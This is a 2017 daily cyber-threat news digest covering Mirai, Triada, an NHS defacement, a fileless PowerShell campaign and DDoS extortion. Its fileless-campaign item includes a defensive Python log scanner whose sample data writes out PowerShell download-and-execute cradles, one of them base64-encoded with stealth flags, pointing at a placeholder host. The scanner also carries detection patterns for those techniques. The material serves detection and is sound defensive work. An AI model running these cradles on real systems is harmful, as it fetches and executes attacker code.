Silobreaker Daily Cyber Digest – 9 February 2017
Mirai discovered in new Windows variant
Dr. Web has discovered a new strain of the Mirai Trojan, a Windows variant used to infect more IoT devices for the purpose of carrying out DDoS attacks. Trojan.Mirai.1 was written in C++ and scans TCP ports across a specified range of IP addresses in order to execute various commands and distribute other malware. More information.
Triada becomes top mobile malware threat
Triada, a modular backdoor for Android, became the most prolific mobile malware last month according to Check Point researchers. It overtook the notorious HummingBad, an Android malware that can establish a persistent rootkit on a device. Triada is notable for granting the malicious actor super-user privileges on infected devices, which allows it to download additional malware and spoof URLs. More information.
Leaks and Breaches
Kurdish hacker defaces NHS trust website
Kurdish hacker MuhmadEmad targeted the Dudley and Walsall Mental Health Partnership NHS Trust as part of an ongoing defacement campaign which has mainly hit Irish organisations. The Trust’s home page was replaced on Sunday with the message: ‘hacked by MuhmadEmad Long Live to Peshmerga’. Emad reportedly exploited a vulnerability in the Trust’s WordPress site, which is hosted by IT service provider TeraFirma. According to a newspaper report, two schools, a pub and a holiday website in the West Midlands suffered similar attacks. More information.
Stealthy campaign targets 140 banks and telecommunications companies
Researchers at Kaspersky Lab have discovered a new campaign targeting over 140 banks, telecommunications companies and government organisations across multiple continents. The campaign harnesses widely available penetration-testing and administration tools as well as PowerShell, the Windows task-automation framework. The attacks deploy malicious code that resides only in memory; those behind them have gone to great lengths to avoid writing files to the hard drive of compromised devices. The attackers remain on infected devices only long enough to gather information, and their traces are wiped from the system on the first reboot. More information.
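The practical consequence of an in-memory, PowerShell-driven intrusion is that disk forensics after a reboot finds nothing, so the only durable record is whatever was logged at execution time. The following is an added example, not code from Kaspersky Lab or from this digest: a small Python checker that runs over process-creation log lines and flags PowerShell invocations carrying the generic hallmarks of download cradles and in-memory loaders, decoding any -EncodedCommand argument (base64 of UTF-16LE) so that indicators hidden inside it are also caught. The key=value log format, the host and user names, the 192.0.2.10 address (a documentation range) and the three log lines are all constructed for the example; the indicator patterns are general PowerShell tradecraft, not indicators from the reported campaign.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Hypothetical process-creation log format, constructed for this example:
# one line per process start, with key=value fields; cmdline is quoted.
LOG_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Generic indicators of PowerShell download cradles and in-memory loaders.
# These are not indicators taken from the Kaspersky Lab report.
INDICATORS: Dict[str, re.Pattern] = {
    "encoded_command": re.compile(
        r"-(?:EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "stealth_flags": re.compile(
        r"-(?:nop|noprofile)\b|-(?:w|windowstyle)\s+hidden"
        r"|-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "reflective_load": re.compile(
        r"Reflection\.Assembly\]?::Load|VirtualAlloc|Marshal\]?::Copy", re.I),
}

# Constructed payload used to build the encoded sample line below.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed sample log: one benign scheduled script, one encoded cradle
# launched with stealth flags, one plain cradle launched via cmd.exe.
SAMPLE_LOG = f"""\
2017-02-08T02:14:11Z host=FS01 user=svc_backup image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -File C:\\scripts\\nightly.ps1"
2017-02-08T02:15:03Z host=DC01 user=admin image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand {ENCODED}"
2017-02-08T02:16:40Z host=WS22 user=jdoe image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
"""


def parse_line(line: str) -> Dict[str, str]:
    """Split a key=value log line into a dict, stripping quotes from values."""
    fields = {}
    for key, value in LOG_FIELD.findall(line):
        fields[key] = value[1:-1] if value.startswith('"') else value
    return fields


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE text).

    Returns None when there is no encoded argument or it does not decode.
    """
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    blob = m.group(0).split()[-1]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per log line with the indicators that matched."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        fields = parse_line(line)
        cmdline = fields.get("cmdline", "")
        decoded = decode_encoded_command(cmdline)
        # Scan the raw command line and the decoded payload together: the
        # cradle itself usually lives only inside the base64 blob.
        haystack = cmdline + ("\n" + decoded if decoded else "")
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
        findings.append({
            "host": fields.get("host"),
            "user": fields.get("user"),
            "indicators": hits,
            "decoded": decoded,
            # Two or more independent indicators on one process start is
            # the threshold used here; tune it against your own baseline.
            "suspicious": len(hits) >= 2,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['host']}/{f['user']} {f['indicators']}")
        if f["decoded"]:
            print("           decoded:", f["decoded"])
```

Running the block prints the benign nightly script as ok and the other two lines as suspicious, with the decoded cradle shown for the DC01 line. The point for defenders is the ordering: this check depends on process-creation or PowerShell script-block logging being shipped off the host as it happens, because nothing here survives the reboot that the report says wipes the attackers' traces.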
Hackers disguise malware in report on Trump’s victory
Hackers have been observed using a document disguised as a report on the new US President. Targeting Mac users, the attack uses macros embedded in a malicious file that shares the title of a genuine Carnegie report. The document name, as well as the sophisticated operational security used in the campaign, indicates the involvement of an Advanced Persistent Threat. More information.
Taiwanese authorities launch investigation after cyber attack threats
Taiwan has launched an investigation after five brokerages in the country received threats from hackers demanding payment to avert DDoS attacks. The victims received an email setting a deadline for a bitcoin ransom payment of almost $10,000. The emails were sent under the name Armada Collective, linking them to the extortion group of that name. The Financial Supervisory Commission has since confirmed that none of the companies made the payment. More information.
Russia arrests 9 suspected hackers with alleged ties to hacker collective Lurk
Nine individuals suspected of stealing £13.5 million from bank accounts since 2013 have been arrested by Russian authorities. Security sources have told news outlets that the individuals are connected to a case against the hacking collective Lurk, which is accused of stealing as much as 3 billion roubles from various organisations. Russian authorities also suspect that the hackers managed to breach critical Russian infrastructure, including military plants. More information.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.